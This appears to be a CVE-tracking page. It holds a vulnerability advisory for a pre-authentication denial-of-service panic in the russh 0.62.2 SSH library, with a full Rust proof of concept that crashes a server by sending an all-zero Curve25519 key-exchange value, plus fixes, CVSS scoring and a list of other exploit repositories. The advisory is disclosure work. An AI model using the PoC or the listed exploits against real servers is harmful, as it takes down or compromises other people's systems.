A pre-authentication denial-of-service panic in `russh` 0.62.2 (commit `c4be19f1915c8682f4615c3fd50008512b474491`, current default branch `main` as of 2026-07-22). An unauthenticated client sends a single `SSH_MSG_KEX_ECDH_INIT` whose `Q_C` is 32 zero bytes. russh's Curve25519 KEX does not reject the all-zero peer public value, so `server_dh()` computes the all-zero shared secret and `compute_exchange_hash()` then calls `encode_mpint(&shared.0, ...)`, which indexes `s[i]` at `i == s.len()` and **panics** (`index out of bounds: the len is 32 but the index is 32`) **before host-key signature verification**. The server KEX task dies on the first KEX message, before authentication. This is reachable with the **default** server configuration (`Config::default()` → `Preferred::DEFAULT`, whose kex list includes `curve25519-sha256`) and requires **no caller-supplied parameter**. It is reproduced end-to-end against the unmodified real russh 0.62.2 library (a real server + raw TCP client over TCP); the PoC below links the real crate, not a copied snippet. The defect is still present on `main` HEAD (`v0.62.3`, 2026-07-22) and is not covered by any of the 11 published russh GHSA advisories (GHSA-cqvm-j2r2-hwpg / CVE-2023-28113 is modp DH group validation, not Curve25519). Rust bounds-checked panics abort the task safely (no memory corruption / RCE); the impact is remote **denial of service**. ## Details `russh/src/kex/curve25519.rs`, `server_dh()` (server path; attacker = client): ```rust fn server_dh(&mut self, exchange: &mut Exchange, payload: &[u8]) -> Result<(), crate::Error> { // only the 32-byte length is checked, NOT zero / low-order: let mut pubkey = MontgomeryPoint([0; 32]); pubkey.0.clone_from_slice(&payload[5..5 + 32]); // line 73 ... let shared = server_secret * client_pubkey; // all-zero when client_pubkey == [0;32] self.shared_secret = Some(shared); // line 86 Ok(()) } ``` The server then computes the exchange hash **before** verifying the host-key signature (`russh/src/server/kex.rs`): ```rust kex.server_dh(exchange, &input.buffer)?; // line 247 ... let hash = kex.compute_exchange_hash(&pubkey_vec, exchange, &mut buffer)?; // line 274 — panics ``` `compute_exchange_hash()` calls `encode_mpint(&shared.0, buffer)`, whose leading-zero skip loop advances `i` to `s.len()` and then indexes `s[i]` (`russh/src/kex/mod.rs`): ```rust pub(crate) fn encode_mpint<W: Writer>(s: &[u8], w: &mut W) -> Result<(), Error> { let mut i = 0; while i < s.len() && s[i] == 0 { i += 1 } // i advances to s.len() for all-zero input if s[i] & 0x80 != 0 { // line 482 — index out of bounds: s[s.len()] ... ``` On Curve25519, `scalar * MontgomeryPoint([0;32])` yields `MontgomeryPoint([0;32])` (the identity element), so the all-zero shared secret is attacker-controlled. RFC 7748 §6 requires implementations to detect and reject all-zero / low-order peer public values and shared secrets; russh does not. The client path (`compute_shared_secret`, curve25519.rs:110-142) has the same chain but is reached only after the server host-key signature is verified, so it requires a malicious server that can sign its own host key (same root cause, lower severity). ## PoC The PoC is a standalone `examples/` binary that links the **unmodified** real russh 0.62.2 crate and reproduces over a real TCP connection. It runs an ATTACK case (all-zero `Q_C` → panic) and a CONTROL case (random `Q_C` → completes kex), proving the panic is caused specifically by the all-zero value. ### One-line reproducer ```bash # Drop the .rs below into russh/examples/ of a checkout of # Eugeny/russh @ c4be19f1915c (tag v0.62.2), then: cargo +stable build --release --example e2e_t13_zero_curve25519 RUST_BACKTRACE=1 ./target/release/examples/e2e_t13_zero_curve25519 ``` ### `russh/examples/e2e_t13_zero_curve25519.rs` ```rust // End-to-end PoC: a pre-auth all-zero Curve25519 peer public value panics // russh's SSH exchange-hash computation. // // A real `russh::server` with `Config::default()` (curve25519-sha256 in the // default kex list) + a real Ed25519 host key is started on a TCP listener. // A raw TCP "attacker" client sends: SSH banner -> SSH_MSG_KEXINIT offering // curve25519-sha256 -> SSH_MSG_KEX_ECDH_INIT with Q_C = 32 zero bytes. // The server drives the real path server_dh -> compute_exchange_hash -> // encode_mpint and panics. A CONTROL case with a random Q_C completes kex. use std::sync::atomic::{AtomicBool, Ordering}; use std::sync::Arc; use byteorder::{BigEndian, ByteOrder}; use russh::server::{self, Handler}; use tokio::io::{AsyncReadExt, AsyncWriteExt}; use tokio::net::{TcpListener, TcpStream}; const MSG_KEXINIT: u8 = 20; const MSG_KEX_ECDH_INIT: u8 = 30; // RFC 8731 §3 const MSG_KEX_ECDH_REPLY: u8 = 31; #[tokio::main] async fn main() { println!("=== russh pre-auth all-zero Curve25519 panic (real russh 0.62.2) ===\n"); let (atk_panic, atk_reply) = run_case(QcKind::AllZero, "ATTACK ").await; println!(); let (ctl_panic, ctl_reply) = run_case(QcKind::Random, "CONTROL").await; println!("\n=== summary ==="); println!("case | server panicked | got ECDH_REPLY"); println!("ATTACK | {atk_panic:<15} | {atk_reply} (Q_C = all-zero)"); println!("CONTROL | {ctl_panic:<15} | {ctl_reply} (Q_C = random non-zero)"); if atk_panic && !atk_reply && !ctl_panic && ctl_reply { println!("\n=> CONFIRMED (end-to-end, real russh 0.62.2):"); println!(" A single pre-auth SSH_MSG_KEX_ECDH_INIT whose Q_C is the"); println!(" all-zero Curve25519 point makes the real russh server panic"); println!(" inside encode_mpint (index out of bounds: len 32, index 32)"); println!(" during compute_exchange_hash, BEFORE host-key verification."); } else { eprintln!("NOT reproduced"); std::process::exit(1); } } enum QcKind { AllZero, Random } async fn run_case(qc: QcKind, label: &'static str) -> (bool, bool) { let panicked = Arc::new(AtomicBool::new(false)); { let flag = panicked.clone(); let prev = std::panic::take_hook(); std::panic::set_hook(Box::new(move |info| { flag.store(true, Ordering::SeqCst); eprintln!("[{label} server task panicked] {info}"); prev(info); })); } // real russh server, DEFAULT config (curve25519-sha256 in the kex list) // + real Ed25519 host key. let mut config = server::Config::default(); config.inactivity_timeout = None; config.auth_rejection_time = std::time::Duration::from_millis(1); config.auth_rejection_time_initial = Some(std::time::Duration::from_millis(1)); config.keys.push( russh::keys::PrivateKey::random(&mut rand::rng(), russh::keys::Algorithm::Ed25519).unwrap(), ); let config = Arc::new(config); let listener = TcpListener::bind("127.0.0.1:0").await.unwrap(); let addr = listener.local_addr().unwrap(); let server_task = tokio::spawn(async move { let (socket, _peer) = listener.accept().await.unwrap(); let session = server::run_stream(config, socket, NoopHandler).await.unwrap(); session.await }); // raw attacker client: SSH banner -> KEXINIT -> ECDH_INIT(Q_C) let mut s = TcpStream::connect(addr).await.unwrap(); s.write_all(b"SSH-2.0-attacker\r\n").await.unwrap(); s.flush().await.unwrap(); let _server_id = read_ssh_id(&mut s).await.unwrap(); let _server_kexinit = read_packet(&mut s).await.unwrap(); s.write_all(&ssh_packet(&kexinit_payload_curve25519())).await.unwrap(); s.flush().await.unwrap(); let q_c: [u8; 32] = match qc { QcKind::AllZero => [0u8; 32], QcKind::Random => { let mut b: [u8; 32] = rand::random(); if b.iter().all(|&x| x == 0) { b[0] = 1; } b } }; let mut ecdh_init = Vec::new(); ecdh_init.push(MSG_KEX_ECDH_INIT); encode_string(&mut ecdh_init, &q_c); s.write_all(&ssh_packet(&ecdh_init)).await.unwrap(); s.flush().await.unwrap(); let qdesc = match qc { QcKind::AllZero => "all-zero", QcKind::Random => "random" }; println!("[{label}] sent SSH_MSG_KEX_ECDH_INIT (Q_C = {qdesc})"); let got_reply = match tokio::time::timeout(std::time::Duration::from_millis(800), read_packet(&mut s)).await { Ok(Ok(pkt)) => { let is_reply = pkt.first() == Some(&MSG_KEX_ECDH_REPLY); println!("[{label}] server sent a packet, first byte = {:?} (ECDH_REPLY={is_reply})", pkt.first()); is_reply } _ => { println!("[{label}] read failed / connection closed (no ECDH_REPLY)"); false } }; let _ = tokio::time::timeout(std::time::Duration::from_secs(1), server_task).await; let server_panicked = panicked.load(Ordering::SeqCst); println!("[{label}] server task panicked = {server_panicked}, got ECDH_REPLY = {got_reply}"); let _ = std::panic::take_hook(); (server_panicked, got_reply) } #[derive(Clone)] struct NoopHandler; impl Handler for NoopHandler { type Error = russh::Error; } fn kexinit_payload_curve25519() -> Vec<u8> { let mut p = Vec::new(); p.push(MSG_KEXINIT); p.extend_from_slice(&[0u8; 16]); // cookie encode_name_list(&mut p, &["curve25519-sha256"]); // kex encode_name_list(&mut p, &["ssh-ed25519"]); // host key encode_name_list(&mut p, &["chacha20-poly1305@openssh.com"]); // c2s cipher encode_name_list(&mut p, &["chacha20-poly1305@openssh.com"]); // s2c cipher encode_name_list(&mut p, &["hmac-sha2-256"]); // c2s mac encode_name_list(&mut p, &["hmac-sha2-256"]); // s2c mac encode_name_list(&mut p, &["none"]); // c2s compression encode_name_list(&mut p, &["none"]); // s2c compression encode_name_list(&mut p, &[]); // c2s languages encode_name_list(&mut p, &[]); // s2c languages p.push(0); // first_kex_packet_follows = false push_u32(&mut p, 0); // reserved p } fn ssh_packet(payload: &[u8]) -> Vec<u8> { let mut padding_len = 8 - ((5 + payload.len()) % 8); if padding_len < 4 { padding_len += 8; } let packet_len = 1 + payload.len() + padding_len; let mut packet = Vec::with_capacity(4 + packet_len); push_u32(&mut packet, packet_len as u32); packet.push(padding_len as u8); packet.extend_from_slice(payload); packet.resize(packet.len() + padding_len, 0); packet } async fn read_packet(stream: &mut TcpStream) -> std::io::Result<Vec<u8>> { let mut len_buf = [0u8; 4]; stream.read_exact(&mut len_buf).await?; let packet_len = BigEndian::read_u32(&len_buf) as usize; let mut packet = vec![0u8; packet_len]; stream.read_exact(&mut packet).await?; let padding_len = packet[0] as usize; Ok(packet[1..packet.len() - padding_len].to_vec()) } async fn read_ssh_id(stream: &mut TcpStream) -> std::io::Result<Vec<u8>> { let mut id = Vec::new(); loop { let mut byte = [0u8; 1]; stream.read_exact(&mut byte).await?; id.push(byte[0]); if byte[0] == b'\n' { return Ok(id); } } } fn encode_name_list(buf: &mut Vec<u8>, names: &[&str]) { encode_string(buf, names.join(",").as_bytes()); } fn encode_string(buf: &mut Vec<u8>, value: &[u8]) { push_u32(buf, value.len() as u32); buf.extend_from_slice(value); } fn push_u32(buf: &mut Vec<u8>, value: u32) { let mut bytes = [0u8; 4]; BigEndian::write_u32(&mut bytes, value); buf.extend_from_slice(&bytes); } ``` Real captured output (ATTACK, `RUST_BACKTRACE=1`): ``` [ATTACK ] sent SSH_MSG_KEX_ECDH_INIT (Q_C = all-zero) [ATTACK server task panicked] panicked at russh/src/kex/mod.rs:482:8: index out of bounds: the len is 32 but the index is 32 thread 'tokio-rt-worker' panicked at russh/src/kex/mod.rs:482:8 stack backtrace: 3: russh::kex::encode_mpint::<CryptoVec> 4: <Curve25519Kex as KexAlgorithmImplementor>::compute_exchange_hash 5: <ServerKex>::step ... server::reply ... Session::run [ATTACK ] server task panicked = true, got ECDH_REPLY = false [CONTROL] server sent a packet, first byte = Some(31) (ECDH_REPLY=true) [CONTROL] server task panicked = false, got ECDH_REPLY = true => CONFIRMED (end-to-end, real russh 0.62.2) ``` The backtrace confirms the real in-library call path on a tokio worker, pre-authentication, before any host-key signature verification. ## Impact **Remote, pre-authentication denial of service of any russh SSH server using the default configuration.** A single 37-byte `SSH_MSG_KEX_ECDH_INIT` (`0x1e` + `0x00000020` + 32 zero bytes) from an unauthenticated client crashes the server's KEX task before authentication. Because the panic is in an async russh task it aborts that connection's handler; depending on the embedder's panic containment it can also tear down the server if the panic is not contained per-connection. A malicious SSH server can symmetrically crash a russh **client** after host-key verification by sending an all-zero `Q_S` in `SSH_MSG_KEX_ECDH_REPLY` (same root cause, lower severity — requires the server to control its own signed host key). No confidentiality/integrity break is demonstrated. The all-zero shared secret would itself be a catastrophic key-compromise if russh did not already crash, but the observed impact is the crash. ### CVSS - `AV:N` — reachable from a remote SSH peer - `AC:L` — requires only a 32-byte all-zero `Q_C` - `PR:N` — pre-authentication - `UI:N` — no user interaction - `C:N`, `I:N` — no confidentiality or integrity impact demonstrated - `A:H` — remote unauthenticated crash of the server KEX task ### Suggested fixes Reject all-zero / low-order Curve25519 peer public values (RFC 7748 §6) in `server_dh()` / `compute_shared_secret()`: ```rust if client_pubkey.0 == [0u8; 32] { return Err(crate::Error::Kex); } ``` and harden `encode_mpint` against the all-zero input: ```rust if i == s.len() { return 0u32.encode(w); // all-zero mpint = empty string per RFC 4251 §5 } ``` ### Affected versions - `russh` **<= 0.62.3** (commit `c4be19f1915c` / current `main` HEAD `v0.62.3`, 2026-07-22). The bug is still present on `main`; it is not covered by any of the 11 published russh GHSA advisories. Default `server::Config` and `client::Config` are affected (no feature flag or opt-in). ## Credit Independently reported by [Zhaodl1](https://github.com/Zhaodl1) and the diff/ambidiff security research effort (afldl).
PoC: CVE-2026-38192
pluck-CMS-4.7.20-code-injection-vulnerability
PoC: CVE-2026-82592
D-Link DIR-825M formDiskFormat stack overflow + command injection RCE PoC (CVE-2026-82592); for authorized security testing
PoC: My-Exploits
Metasploit modules, Python PoCs and throwaway Docker labs for four platform CVEs: Keycloak (CVE-2026-18963), Apache NiFi (CVE-2026-39816), HashiCorp Vault (CVE-2026-5006), HashiCorp Nomad (CVE-2026-7474).
PoC: CVE-2025-66478-PoC-Reverse-Shell
CVE-2025-66478 PoC
PoC: cve-writeups-and-pocs
CVE-2026-80724 PoC + full write-up — Linux kernel ptp/vmclock read-only mapping becomes writable (VM_MAYWRITE). Discovered, reported & fixed by Abdifatah Suruur (suruurism)
PoC: CVE-2026-79483-FastGPT-NoSQL-Injection
FastGPT Community Edition NoSQL Injection PoC (CVE-2026-79483)
PoC: givewp-cve-2026-82222-rce-lab
Authorized Docker lab and clean PoC for validating CVE-2026-82222 RCE in GiveWP 4.16.5.1 and the 4.16.7.2 fix.
PoC: CVE-2026-19745
Learn how I found my first two CVEs by pure accident.
PoC: cve-2026-23989-opencloud-lab
Reproduction lab (A/B Docker) for CVE-2026-23989 — OpenCloud / ownCloud Infinite Scale public-link scope-validation bypass in Reva
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: PoC-and-yara-rules-of-CVE-2025-59528-Flowise-has-Remote-Code-Execution-vulnerability
poc and yara rules
PoC: ActiveMQ-CVE-2023-46604
Exploit POC for Apache ActiveMQ CVE-2023-46604
PoC: gha-lab-0ba60e6456
Authorized security-research lab reproducing CVE-2024-39700 / GHSA-45gq-v5wm-82wg (JupyterLab extension-template update-integration-tests pwn request)
PoC: CVE-2026-36130
CVE-2026-36130
PoC: CVE-2026-31321
CVE-2026-31321
PoC: postgresql-cve-2026-14662
PostgreSQL の全文検索(tsvector/tsquery)に見つかった範囲外書き込み脆弱性 CVE-2026-14662 を、修正前(18.4)と修正後(18.6)を Docker で並べて動かして検証した記録と発表資料
PoC: CVE-2026-27472-and-CVE-2026-27474
PoC for CVE-2026-27472 and CVE-2026-27474
PoC: CVE-2026-27475
PoC for CVE-2026-27475
PoC: CVE-2026-18963
Unauthenticated account takeover via reset-credentials flow bypass
PoC: CVE-2026-0768
CVE-2026-0768 - Draft or TODO
PoC: CVE-2026-82329
CVE-2026-82329 - Draft or TODO
PoC: tomcat-line-check
CVE-2026-24880: does Apache's upgrade advice actually apply to your Tomcat? Detects the fix by class presence, not version comparison. Covers 7.0/8.0/8.5/9.0/10.0/10.1/11.0 lines.
PoC: log4j2-vuln-lab
CVE-2021-44228 (Log4Shell) 漏洞复现靶场 | SpringBoot + Log4j2 2.14.1 | 3 个攻击向量 PoC 验证
PoC: CVE-2021-3493-Exploit
It's a CVE-2021-3493 Exploit written in C
PoC: gha-lab-8e9316151c
Controlled security-research lab reproducing CVE-2024-1540 (GitHub Actions command injection in gradio-app/gradio deploy+test-visual.yml) — flattened snapshot of gradio-app/gradio @ f35f615e33a5dd90bfeb106b6f5dca689849fcef
PoC: gha-lab-6255f5fc33
Security-research lab reproducing CVE-2023-6572 (GHSA-gqvf-3hgp-5hxv): command injection in gradio-app/gradio's workflow_run handling of generate-changeset.yml
PoC: nextcloud-cve-2023-49792-research
A project analysis of CVE-2023-49792, inspired by a HackerOne report I have recently come across.
PoC: CVE-2026-30252
The ZenShare Suite application is vulnerable by a Reflected Cross-Site Scripting (XSS) vulnerability, affecting web application login and recovery password functionalities.
PoC: CVE-2026-30251
A reflected cross-site scripting (XSS) vulnerability in the login_newpwd.php endpoint of Interzen Consulting S.r.l ZenShare Suite v17.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via a crafted URL injected into the codice_azienda parameter.
PoC: gha-lab-fb32aba4a3
Authorized lab reproduction of CVE-2023-26493 (GHSL-2023-027): command injection via github.head_ref in cocos-engine's <Web> Interface check pull_request_target workflow
PoC: CVE-2018-14667_Lab_POC
Demonstration of the expression language (EL) injection vulnerability CVE-2018-14667 using the photoalbum lab under Jboss application server
PoC: weakrng-sweep
Weak-RNG stream-sweep research (CVE-2026-71851 class): PRNG schemes x seeds -> BIP39 -> victim set membership
PoC: cve-2022-29117-assessment
CVE-2022-29117 (.NET Cookie-Handling DoS) Assessment, Understanding & Questions Framework
PoC: POC-CVE-2026-0073
Security research PoC for CVE-2026-0073: ADB authentication bypass verification
PoC: gha-lab-232af4821f
Security-research lab reproducing CVE-2021-4281 (GHSA-3796-3f93-cfvx): shell command injection via PR head-branch name in .github/workflows/combine-prs.yml (snapshot of BraveUX/for-the-badge @ 409c1fda). Do not use; authorized reproduction only.
PoC: CVE-2026-82222
GiveWP <= 4.16.7.1 Unauthenticated PHP Object Injection → RCE
PoC: CVE-2026-76569
Reflected XSS via search GET Parameter in Phoca Download
PoC: activemq-cve-lab
ActiveMQ CVE-2015-5254 模拟靶场 - 用于 CVE 测试评测和 SCA 扫描演示
PoC: ghostlock-x200-app
vivo X200 设备端一键 root App(Shizuku 授权 shell 域执行,CVE-2026-43499)
PoC: gha-lab-b9842b12c0
Authorized security-research lab reproducing CVE-2021-21423 (GHSA-gg2g-m5wc-vccq): projen rebuild-bot pwn request via issue_comment
PoC: gha-lab-e4a85583c3
Security-research lab reproducing CVE-2020-36762 (GHSA-h9gr-83jq-f3xc): bash command injection via github.event.comment.body in the comment workflow of ONSdigital/ras-collection-instrument
PoC: Root-My-Galaxy
KSU installer for supported Samsung Galaxy firmware with CVE-2026-43499
PoC: CVE-2026-78905-Facebook-Account-Takeover
Social Media Infrastructure Vulnerability Research. CVE-2026-78905: OAuth token reuse and session hijacking in Facebook's Graph API.
PoC: CVE-2026-78904-Digital-Dinar-Drain
CBDC Infrastructure Vulnerability Research. CVE-2026-78904: Infinite mint and redemption bypass in central bank digital currency APIs.
PoC: CVE-2026-78903-SWIFT-Kick-to-the-Creds
Offensive Research & Exploit Development. Vulnerability research, PoC development, and offensive tooling for financial infrastructure.
PoC: CVE-2026-60004-Gitea-RCE-PoC
🫖 Direct single-target Gitea CVE-2026-60004 RCE validation PoC
PoC: CVE-2026-60004-Gitea-Validator
🫖 Contract-correlated discovery and authorized validation tool for Gitea CVE-2026-60004
PoC: cve-2026-67363-67364
Balboa form Command Injection POC
PoC: Simulation-d-attaque-BlueBorne-sur-v-hicule-connect-
Simulation complète d'une attaque Bluetooth (CVE-2017-1000251) sur un véhicule autonome via CARLA Simulator ; exploitation de la vulnérabilité BlueBorne pour accéder au bus CAN et déclencher un freinage brutal, en environnement isolé (Kali Linux VM / VMware / Python).
PoC: CVE-2026-76581-Detector
Safe passive detector for identifying WPMU DEV Dashboard versions affected by CVE-2026-76581.
PoC: htb-machine-ringdown
Detailed design & exploitation writeup for Ringdown—an original Debian/Asterisk vulnerable machine featuring CVE-2024-42365 (AMI), PJSIP pre-hash cracking, and Fail2ban POSIX ACL privilege escalation.
PoC: gha-lab-83342297e0
Authorized security-research lab reproducing CVE-2024-41127 (GHSA-wcjf-5464-4wq9): poisoned pipeline execution via artifact-controlled code injection in ci-failure-comment.yml. Snapshot of monkeytypegame/monkeytype @ deeea0f.
PoC: WP2Shell-Scanner
Read-only CLI to check whether a WordPress site is exposed to WP2Shell (CVE-2026-63030 / CVE-2026-60137)
PoC: phpBB-CVE-2026-48611
Automated PoC for CVE-2026-48611 — phpBB OAuth login_link authentication bypass
PoC: Project-CVE-2026-45833
CVE-2026-45833 ChromaDB
PoC: CitrixBleedCVE-2026-8452-2025-5777
CitrixBleed Exploit Tool - CVE-2025-5777 & CVE-2026-8452. Unauthenticated remote memory read from Citrix NetScaler ADC & Gateway. Steal admin session tokens, extract nsroot hashes, dump secrets, and bypass MFA. Python 3 exploit with full memory parsing.
PoC: CVE-2026-76581
CVE-2026-76581
PoC: drupalgeddon2-cve-lab
Drupalgeddon2 CVE-2018-7600 vulnerable Drupal 7 lab
PoC: shellshock-cve-lab
Shellshock CVE-2014-6271 vulnerable CGI lab
PoC: log4shell-cve-lab
Log4Shell CVE-2021-44228 vulnerable lab
PoC: CVE-2026-18741
PoC CVE-2026-18741
PoC: CVE-2026-12513
CVE-2026-12513 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK).
PoC: ghostlock-oppo-watch3pro
CVE-2026-43499 on OPPO Watch 3 Pro
PoC: cve-2026-82222-poc
Public PoC for CVE-2026-82222
PoC: zk-xml-probe
Static XML fixtures for authorized bug bounty testing of XML parser behaviour (CVE-2026-45071).
PoC: SOC335-CVE-2024-49138-Investigation
SOC investigation of a CVE-2024-49138 exploitation alert using log analysis, threat intelligence, and endpoint containment.
PoC: papercut-toolkit
#PaperCut CVE-2026-81578 + CVE-2026-82078 Defense Toolkit 2 3 A **defensive** toolkit to check and understand exposure to the chained
PoC: PaperCut-CVE-2026-81578-82078
Security research tool for PaperCut CVE-2026-81578 & CVE-2026-82078
PoC: vankyo-s30-bootloader-unlock
Vankyo MatrixPad S30 (Unisoc SC9863A) — Bootloader unlock via CVE-2022-38694 FDL1 method
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: hdwebmobile-formula-pricing
WooCommerce plugin: safe formula-based product pricing, closing CVE-2026-4001's eval()-based RCE
PoC: CVE-2026-82286-gpt-crawler-Arbitrary-File-Write
CVE-2026-82286 — gpt-crawler <=1.5.1 unauthenticated arbitrary file write via outputFileName (POST /crawl). PoC + self-contained Docker lab. CVSS 8.6, CWE-22.
PoC: CVE-2026-24061-payload
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
PoC: CVE-2026-66384
CVE-2026-66384 - Draft or TODO
PoC: CVE-2026-33017-PoC-Reverse-Shell
CVE-2026-33017 PoC Reverse Shell
PoC: CVE-2026-33057---Mesop-Unauthenticated-RCE-PoC-and-yara-rules
CVE-2026-33057 - Mesop Unauthenticated RCE PoC and yara rules
PoC: CVE-2026-10036-speechbrain-rce
SpeechBrain < 1.1.1 checkpoint metadata RCE via unsafe PyYAML parsing of CKPT.yaml.
PoC: CVE-2025-55182-poc
I know you are probably here from Hack the Box, if so, yes this one actually works.
PoC: Project-CVE-2026-50751
IKEv1 VPN scanners, attempts a Check Point authentication-bypass exploit, and includes internal network scanning and reverse-shell features.
PoC: CTT-Enhanced-CVE-2026-46339-Exploit-Engine
A specialized Python framework that executes unauthenticated remote code execution via the 9Router Model Context Protocol (MCP) bridge by deploying a 33-layer temporal phase cascade, Riemann-Hadamard dispersion, and an 11 ns wedge filter to bypass traditional proxy and process-monitoring defenses.
PoC: Zimbra-CVE-2026-73570-Rules
Wazuh Rules for Detection Zimbra (CVE-2026-73570).
PoC: CVE-2022-46169
Cacti 1.2.22 unauthenticated command injection
PoC: CVE-2024-23897
Jenkins CVE-2024-23897 — CSRF-crumb aware PoC
PoC: CVE-2025-10952-ml-logger-AFR
PoC for CVE-2025-10952 — ml-logger unauthenticated arbitrary file read. CVSS 5.3
PoC: CVE-2026-65643
CVE-2026-65643 - Draft or TODO
PoC: cve-2023-23397-detection-lab
Detection and mitigation research lab for CVE-2023-23397 using network and endpoint security telemetry.
PoC: fastjson-cve
fastjson-cve-2026-16723
PoC: CVE-2026-23751-poc
Patched RemotingClient to exploit CVE-2026-23751 (Tungsten Automation - Kofax Capture Unauthenticated File Read/Write and SMB coercion via .NET HTTP Remoting)
PoC: CVE-2023-27350-CVE-2023-27351
CVE-2023-27350, CVE-2023-27351 - PaperCut - Draft or TODO
PoC: Project-CVE-2026-33017
CVE-2026-33017 - Langflow Unauthenticated RCE Exploit
PoC: CVE-2026-70463
Testing CVE-2026-70463 by Fyyre
PoC: 2025-Oracle-SSO-LDAP-Attack-Post-Incident-Written-Report
Post-incident report analyzing the Oracle Cloud SSO/LDAP supply chain attack (CVE-2021-35587). Details the exploitation of legacy server infrastructure, impact across 140,000+ cloud tenants, root-cause findings, and phased mitigation strategies.
PoC: CVE-2026-20131-Post-Incident-Written-Report
Post-incident report on CVE-2026-20131 (CVSS 10.0), a Cisco FMC insecure deserialization vulnerability exploited by Interlock ransomware. Details root-cause analysis, lateral movement tactics, and emergency containment strategies.
PoC: ghostlock-pfem10
GhostLock (CVE-2026-43499 / IonStack) research for OPPO Find X5 Pro (PFEM10): exploit chain, progress, blocker log, and OPPO 5-series kernel notes
PoC: htb-labs-connected
Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege escalation to root via FreePBX and incron.
PoC: spring-ai-sibling-loop-poc
Minimal reproduction for Spring AI ParagraphManager sibling self-loop OOM (incomplete fix of CVE-2026-47851)
PoC: mssharepoint-scanner
A scanner for CVE-2026-55040 and CVE-2026-63520, designed to determine whether the server is affected by these two CVEs.
PoC: weblogic
Oracle WebLogic Console unauthenticated auth bypass + RCE exploit (CVE-2020-14882 / CVE-2020-14750)
PoC: CVE-2021-27876-veritas-backup
Metasploit module: Veritas Backup Exec Agent SHA-auth NDMP remote code execution (CVE-2021-27876/27877/27878)
PoC: Project-CVE-2026-65351
For educational purposes
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Get alerted for CVEs like this
Register your stack and get notified within minutes when a matching CVE drops.
Start monitoring free